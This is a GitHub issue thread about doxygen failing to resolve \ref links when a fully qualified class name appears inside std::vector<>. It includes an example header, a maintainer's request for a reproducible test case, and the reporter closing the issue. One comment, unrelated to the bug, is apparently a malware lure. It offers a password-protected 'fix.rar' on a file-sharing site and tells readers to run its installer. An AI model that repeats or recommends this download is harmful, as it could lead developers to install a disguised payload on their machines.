### ISSUE TITLE
\ref unable to resolve reference when fully specified class name used in std::vector<>

### ISSUE THREAD

**Issue by pipsqik** [doxygen/doxygen#11105]
**Describe the bug**
Given this example (generating HTML):
```
#include <vector>
/** \namespace NS my namespace */
namespace NS {
    class A { ... };

   /** \brief A function
   *  \param x  Something 
   */
    void foo(std::vector<A> const & x);

   /** \brief Another function
   *  \param x  Something 
   */
    void bar(A const& x);

   /**  \brief A test function
    * \remark
    * - This ref fails:  \ref NS::foo(std::vector<NS::A> const &) 
    * - This ref works:  \ref NS::foo(std::vector<A> const &) 
    * - This ref works:  \ref NS::bar(A const &) 
    * - This ref works:  \ref NS::bar(NS::A const &) 
   */ 
   void test();
}
```
The comments describe the result!

If  you use a \ref within a given namespace then in 1.12.0 you MUST not use the fully specified name for any class A where the parameter is a std::vector<A>, yet from outside the namespace you must use fully qualified names.  This only affects vectors of classes, and probably any other standard container of classes (not checked)

This is obviously a significant problem in larger projects where you might want to use an ALIAS or \copydoc to include a reference in multiple places - possibly in multiple namespaces.  This did not occur in version 1.9.3 - not sure which version introduced it.

**Expected behavior**
All references should be resolved.

**Version**
1.12.0 Windows 10, 64 bit
Expected behaviour worked in v 1.9.3

**Comment by albert-github** [comment]
You wrote:
> Expected behaviour worked in v 1.9.3

but I don't see a difference between the current, 1.12.0, doxygen version and the 1.9.3. version.
Both case I get:
```
aa.h:18: warning: unable to resolve reference to 'NS::foo(std::vector<NS::A> const &)' for \ref command
```
and there is no link in the line `      This ref fails: NS::foo(std::vector<NS::A> const &)`

Please explain and also:
- Can you please attach a, small, self contained example (source+configuration file in a, compressed, tar or zip file!) that allows us to reproduce the problem? Please don't add external links as they might not be persistent (also references to GitHub repositories are considered non persistent).

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by pipsqik** [comment]
Ah - OK - I didn't check my constructed example in 1.9.3!   I have a "real" example but I can't get the full source code to you...   I'll look again at the example.

**Comment by pipsqik** [comment]
I'll just close this for now, I'm struggling to cut down the example I see (ie something that works in 1.9.3 and doesn't in 1.12.0) in my real code base to something manageable that I can send you.   As I cut out what ought to be extraneous code I end up with something that works in both versions, or something that fails in both versions :-(

If I manage to find something more helpful in the future I'll send it through.
